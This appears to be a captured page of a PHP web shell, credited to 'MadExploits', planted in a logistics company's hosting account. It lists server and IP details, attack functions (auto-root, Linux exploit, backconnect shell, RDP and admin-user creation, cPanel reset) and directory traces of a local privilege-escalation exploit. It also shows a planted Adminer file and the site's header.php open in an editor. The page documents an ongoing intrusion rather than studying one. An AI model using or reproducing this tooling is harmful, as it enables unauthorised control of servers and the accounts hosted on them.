Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.96
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
swift-xpc.com /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
footer.php
4.91
KB
-rw-r--r--
header.php
2.39
KB
-rw-r--r--
main_content.php
1.79
KB
-rw-r--r--
navbar.php
4.17
KB
-rw-r--r--
sidebar.php
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php session_start(); ?> <?php error_reporting(0); date_default_timezone_set('Africa/Lagos'); $link = ""; include("db.php"); include("functions.php"); $site =$_SERVER["REQUEST_URI"]; $site_name ="Swiftxpress Delivery"; $current_time = date('y-m-d, h:ia'); $only_time= date('y-m-d'); // $current_time = date('D, d/m/Y - h:ia', strtotime($current_time)); $_SESSION['sess_user'] = $_SESSION['sess_user']; $user = $_SESSION['sess_user']; $base_url = $_SERVER['PHP_SELF']; $domain ="swift-xpc.com"; $webmail= "support@swift-xpc.com"; $call = ""; $site_address = $address ="101 Hall Avenue, TX. USA"; $time = date('y-m-d, h:ia'); ?> <head> <!--====== USEFULL META ======--> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- xxx Change With Your Information xxx --> <meta name="viewport" content="width=device-width, initial-scale=1.0 user-scalable=no" /> <meta name="description" content="A distinguished class of logistic companies with a clear defined market path in the world" /> <meta name="keywords" content="logistics" /> <meta property="og:image" content="assets/img/instafeed/1.jpg" /> <!--====== TITLE TAG ======--> <title><?php echo $site_name?></title> <!--====== FAVICON ICON =======--> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="shortcut icon" type="image/x-icon" href="img/favicon.ico"> <!-- Place favicon.ico in the root directory --> <link rel="stylesheet" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" href="assets/css/owl.carousel.min.css"> <link rel="stylesheet" href="assets/css/slicknav.css"> <link rel="stylesheet" href="assets/css/flaticon.css"> <link rel="stylesheet" href="assets/css/animate.min.css"> <link rel="stylesheet" href="assets/css/magnific-popup.css"> <link rel="stylesheet" href="assets/css/fontawesome-all.min.css"> <link rel="stylesheet" href="assets/css/themify-icons.css"> <link rel="stylesheet" href="assets/css/slick.css"> <link rel="stylesheet" href="assets/css/nice-select.css"> <link rel="stylesheet" href="assets/css/style.css"> </head> <style type="text/css"> #wrap{ white-space: pre-wrap; } </style>
Close